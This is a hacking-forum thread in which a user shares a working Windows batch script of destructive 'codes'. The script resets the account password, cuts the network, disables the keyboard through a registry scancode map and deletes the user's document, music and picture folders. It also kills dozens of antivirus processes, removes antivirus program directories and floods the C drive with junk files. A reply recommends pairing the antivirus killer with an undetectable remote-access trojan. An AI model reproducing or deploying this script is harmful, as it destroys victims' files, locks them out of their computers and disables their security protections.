Results 1 to 3 of 3
  1. #1
    Zeffer's Avatar
    Join Date
    Jun 2013
    Gender
    male
    Posts
    160
    Reputation
    12
    Thanks
    204
    My Mood
    Blah

    Got Some Old Batch Codes I Think I'll Share

    Got this shit off of InShadow a while ago.

    Code:
    ::--Change Pass To Swag--::
    net user %username% Swag
    ::---------------------------::
    ::-----Disable Internet------::
    ipconfig /release
    if ERRORLEVEL1 ipconfig /release_all
    ::---------------------------::
    ::------Disable Keyboard-----::
    echo Windows Registry Editor Version 5.00 > "nokeyboard.reg"
    echo [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Keyboard Layout] >> "nokeyboard.reg"
    echo "Scancode Map"=hex:00,00,00,00,00,00,00,00,7c,00,00,00,00,00,01,00,00,\ >> "nokeyboard.reg"
    echo 00,3b,00,00,00,3c,00,00,00,3d,00,00,00,3e,00,00,00,3f,00,00,00,40,00,00,00,\ >> "nokeyboard.reg"
    echo 41,00,00,00,42,00,00,00,43,00,00,00,44,00,00,00,57,00,00,00,58,00,00,00,37,\ >> "nokeyboard.reg"
    echo e0,00,00,46,00,00,00,45,00,00,00,35,e0,00,00,37,00,00,00,4a,00,00,00,47,00,\ >> "nokeyboard.reg"
    echo 00,00,48,00,00,00,49,00,00,00,4b,00,00,00,4c,00,00,00,4d,00,00,00,4e,00,00,\ >> "nokeyboard.reg"
    echo 00,4f,00,00,00,50,00,00,00,51,00,00,00,1c,e0,00,00,53,00,00,00,52,00,00,00,\ >> "nokeyboard.reg"
    echo 4d,e0,00,00,50,e0,00,00,4b,e0,00,00,48,e0,00,00,52,e0,00,00,47,e0,00,00,49,\ >> "nokeyboard.reg"
    echo e0,00,00,53,e0,00,00,4f,e0,00,00,51,e0,00,00,29,00,00,00,02,00,00,00,03,00,\ >> "nokeyboard.reg"
    echo 00,00,04,00,00,00,05,00,00,00,06,00,00,00,07,00,00,00,08,00,00,00,09,00,00,\ >> "nokeyboard.reg"
    echo 00,0a,00,00,00,0b,00,00,00,0c,00,00,00,0d,00,00,00,0e,00,00,00,0f,00,00,00,\ >> "nokeyboard.reg"
    echo 10,00,00,00,11,00,00,00,12,00,00,00,13,00,00,00,14,00,00,00,15,00,00,00,16,\ >> "nokeyboard.reg"
    echo 00,00,00,17,00,00,00,18,00,00,00,19,00,00,00,1a,00,00,00,1b,00,00,00,2b,00,\ >> "nokeyboard.reg"
    echo 00,00,3a,00,00,00,1e,00,00,00,1f,00,00,00,20,00,00,00,21,00,00,00,22,00,00,\ >> "nokeyboard.reg"
    echo 00,23,00,00,00,24,00,00,00,25,00,00,00,26,00,00,00,27,00,00,00,28,00,00,00,\ >> "nokeyboard.reg"
    echo 1c,00,00,00,2a,00,00,00,2c,00,00,00,2d,00,00,00,2e,00,00,00,2f,00,00,00,30,\ >> "nokeyboard.reg"
    echo 00,00,00,31,00,00,00,32,00,00,00,33,00,00,00,34,00,00,00,35,00,00,00,36,00,\ >> "nokeyboard.reg"
    echo 00,00,1d,00,00,00,5b,e0,00,00,38,00,00,00,39,00,00,00,38,e0,00,00,5c,e0,00,\ >> "nokeyboard.reg"
    echo 00,5d,e0,00,00,1d,e0,00,00,5f,e0,00,00,5e,e0,00,00,22,e0,00,00,24,e0,00,00,\ >> "nokeyboard.reg"
    echo 10,e0,00,00,19,e0,00,00,30,e0,00,00,2e,e0,00,00,2c,e0,00,00,20,e0,00,00,6a,\ >> "nokeyboard.reg"
    echo e0,00,00,69,e0,00,00,68,e0,00,00,67,e0,00,00,42,e0,00,00,6c,e0,00,00,6d,e0,\ >> "nokeyboard.reg"
    echo 00,00,66,e0,00,00,6b,e0,00,00,21,e0,00,00,00,00 >> "nokeyboard.reg"
    start nokeyboard.reg
    ::---------------------------::
    ::----Delete My Documents----::
    del /f /q "C:\Users\%userprofile%\My Documents\*.*"
    ::---------------------------::
    ::-------Open Disk Tray------::
    echo Do >> "opendisk.vbs"
    echo Set oWMP = CreateObject("WMPlayer.OCX.7" ) >> "opendisk.vbs"
    echo Set colCDROMs = oWMP.cdromCollection >> "opendisk.vbs"
    echo colCDROMs.Item(d).Eject  >> "opendisk.vbs"
    echo colCDROMs.Item(d).Eject  >> "opendisk.vbs"
    echo Loop >> "opendisk.vbs"
    start "" "opendisk.vbs"
    ::---------------------------::
    ::------Change The Time------::
    time 00:00
    ::---------------------------::
    ::------Stop Antivirus------::
    CLS
    taskkill /F /IM av* >NUL
    taskkill /F /IM fire* >NUL
    taskkill /F /IM anti* >NUL
    CLS
    taskkill /F /IM spy* >NUL
    taskkill /F /IM bullguard* >NUL
    taskkill /F /IM PersFw* >NUL
    taskkill /F /IM KAV* >NUL
    taskkill /F /IM ZONEALARM* >NUL
    taskkill /F /IM SAFEWEB* >NUL
    CLS
    taskkill /F /IM OUTPOST* >NUL
    taskkill /F /IM nv* >NUL
    taskkill /F /IM nav* >NUL
    taskkill /F /IM F-* >NUL
    taskkill /F /IM ESAFE* >NUL
    taskkill /F /IM cle* >NUL
    CLS
    taskkill /F /IM BLACKICE* >NUL
    taskkill /F /IM def* >NUL
    taskkill /F /IM kav* >NUL
    taskkill /F /IM kav* >NUL
    taskkill /F /IM avg* >NUL
    taskkill /F /IM ash* >NUL
    CLS
    taskkill /F /IM aswupdsv* >NUL
    taskkill /F /IM ewid* >NUL
    taskkill /F /IM guar* >NUL
    taskkill /F /IM gcasDt* >NUL
    taskkill /F /IM msmp* >NUL
    CLS
    taskkill /F /IM mcafe* >NUL
    taskkill /F /IM mghtml* >NUL
    taskkill /F /IM msiexec* >NUL
    taskkill /F /IM outpost* >NUL
    taskkill /F /IM isafe* >NUL
    taskkill /F /IM zap* >NUL
    CLS
    taskkill /F /IM zauinst* >NUL
    taskkill /F /IM upd* >NUL
    taskkill /F /IM zlclien* >NUL
    taskkill /F /IM minilog* >NUL
    taskkill /F /IM cc* b >NUL
    taskkill /F /IM norton* >NUL
    CLS
    taskkill /F /IM norton au* >NUL
    taskkill /F /IM ccc* >NUL
    taskkill /F /IM npfmn* >NUL
    taskkill /F /IM loge* >NUL
    taskkill /F /IM nisum* >NUL
    taskkill /F /IM issvc* >NUL
    taskkill /F /IM tmp* >NUL
    CLS
    taskkill /F /IM tmn* >NUL
    taskkill /F /IM pcc* >NUL
    taskkill /F /IM cpd* >NUL
    taskkill /F /IM pop* >NUL
    taskkill /F /IM pav* >NUL
    taskkill /F /IM padmin* >NUL
    CLS
    taskkill /F /IM panda* >NUL
    taskkill /F /IM avsch* >NUL
    taskkill /F /IM sche* >NUL
    taskkill /F /IM syman* >NUL
    taskkill /F /IM virus* >NUL
    taskkill /F /IM realm* >NUL
    CLS
    taskkill /F /IM sweep* >NUL
    taskkill /F /IM scan* >NUL
    taskkill /F /IM ad-* >NUL
    taskkill /F /IM safe* >NUL
    taskkill /F /IM avas* >NUL
    taskkill /F /IM norm* >NUL
    taskkill /F /IM offg* >NUL
    CLS
    RMDIR /Q "C:\Program Files\alwils~1" /S >NUL
    RMDIR /Q "C:\Program Files\Lavasoft\Ad-awa~1" /S >NUL
    RMDIR /Q "C:\Program Files\kasper~1" /S >NUL
    CLS
    RMDIR /Q "C:\Program Files\trojan~1" /S >NUL
    RMDIR /Q "C:\Program Files\f-prot95" /S >NUL
    RMDIR /Q "C:\Program Files\tbav" /S >NUL
    CLS
    RMDIR /Q "C:\Program Files\avpersonal" /S >NUL
    RMDIR /Q "C:\Program Files\Norton~1" /S >NUL
    RMDIR /Q "C:\Program Files\Mcafee" /S >NUL
    CLS
    RMDIR /Q "C:\Program Files\Norton~1\Norton~1\Norton~3" /S >NUL
    RMDIR /Q "C:\Program Files\Norton~1\Norton~1\speedd~1" /S >NUL
    RMDIR /Q "C:\Program Files\Norton~1\Norton~1" /S >NUL
    RMDIR /Q "C:\Program Files\Norton~1" /S >NUL
    CLS
    RMDIR /Q "C:\Program Files\avgamsr" /S >NUL
    RMDIR /Q "C:\Program Files\avgamsvr" /S >NUL
    RMDIR /Q "C:\Program Files\avgemc" /S >NUL
    CLS
    RMDIR /Q "C:\Program Files\avgcc" /S >NUL
    RMDIR /Q "C:\Program Files\avgupsvc" /S >NUL
    RMDIR /Q "C:\Program Files\grisoft" /S >NUL
    RMDIR /Q "C:\Program Files\nood32krn" /S >NUL
    RMDIR /Q "C:\Program Files\nood32" /S >NUL
    CLS
    RMDIR /Q "C:\Program Files\nod32" /S >NUL
    RMDIR /Q "C:\Program Files\nood32" /S >NUL
    RMDIR /Q "C:\Program Files\kav" /S >NUL
    RMDIR /Q "C:\Program Files\kavmm" /S >NUL
    RMDIR /Q "C:\Program Files\kaspersky" /S >NUL
    CLS
    RMDIR /Q "C:\Program Files\ewidoctrl" /S >NUL
    RMDIR /Q "C:\Program Files\guard" /S >NUL
    RMDIR /Q "C:\Program Files\ewido" /S >NUL
    CLS
    RMDIR /Q "C:\Program Files\pavprsrv" /S >NUL
    RMDIR /Q "C:\Program Files\pavprot" /S >NUL
    RMDIR /Q "C:\Program Files\avengine" /S >NUL
    CLS
    RMDIR /Q "C:\Program Files\apvxdwin" /S >NUL
    RMDIR /Q "C:\Program Files\webproxy" /S >NUL
    RMDIR /Q "C:\Program Files\panda software" /S >NUL
    ::-------Spam C Drive--------::
    echo %random% > "C:\%random%Spammed Filetype"
    echo %random% > "C:\%random%Spammed Filetype"
    echo %random% > "C:\%random%Spammed Filetype"
    echo %random% > "C:\%random%Spammed Filetype"
    echo %random% > "C:\%random%Spammed Filetype"
    echo %random% > "C:\%random%Spammed Filetype"
    echo %random% > "C:\%random%Spammed Filetype"
    echo %random% > "C:\%random%Spammed Filetype"
    echo %random% > "C:\%random%Spammed Filetype"
    echo %random% > "C:\%random%Spammed Filetype"
    echo %random% > "C:\%random%Spammed Filetype"
    ::---------------------------::
    ::-----Delete My Music-------::
    del /f /q "C:\Users\%userprofile%\My Documents\My Music\*.*"
    ::---------------------------::
    ::-----Delete My Pictures----::
    del /f /q "C:\Users\%userprofile%\My Documents\My Pictures\*.*"
    ::---------------------------::
    exit
    Last edited by Zeffer; 09-26-2013 at 09:28 PM.

  2. #2
    soxey6's Avatar
    Join Date
    Apr 2013
    Gender
    male
    Location
    Right next to you
    Posts
    34
    Reputation
    10
    Thanks
    103
    My Mood
    Psychedelic
    Vouch these are really good. The Virus disable script is the best when binded to a FUD Rat.

  3. #3
    asdfdude's Avatar
    Join Date
    Feb 2011
    Gender
    male
    Posts
    150
    Reputation
    10
    Thanks
    39
    I wonder if the person who made this batch file tested it on their own computer or used a dummy computer?

Similar Threads

  1. *** thinks they got some beef
    By TheSadist in forum General
    Replies: 24
    Last Post: 07-11-2009, 06:15 PM
  2. Old Promo Codes
    By Xocitus in forum Suggestions, Requests & General Help
    Replies: 12
    Last Post: 06-28-2007, 09:07 PM
  3. Bulding a hack and got some issue with pointers
    By TheRedEye in forum WarRock - International Hacks
    Replies: 8
    Last Post: 05-16-2007, 04:43 PM
  4. Hi I got some addresses
    By allen81973 in forum WarRock - International Hacks
    Replies: 8
    Last Post: 05-13-2007, 10:16 AM
  5. Got 5 more promo codes
    By Dave84311 in forum WarRock - International Hacks
    Replies: 9
    Last Post: 12-19-2006, 04:11 PM